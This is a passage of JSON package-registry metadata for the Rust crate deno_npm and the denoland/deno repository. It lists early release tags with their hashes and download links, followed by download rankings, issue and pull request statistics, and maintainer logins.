anifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T02:51:35.745Z","dependent_packages_count":3,"downloads":999765,"downloads_period":"total","dependent_repos_count":1,"rankings":{"downloads":7.005841313473864,"dependent_repos_count":16.5399651664312,"dependent_packages_count":9.159883090769103,"stargazers_count":22.108810496977487,"forks_count":16.898976838738125,"docker_downloads_count":null,"average":14.342695381277958},"purl":"pkg:cargo/deno_npm","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_npm","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_npm","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_npm/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms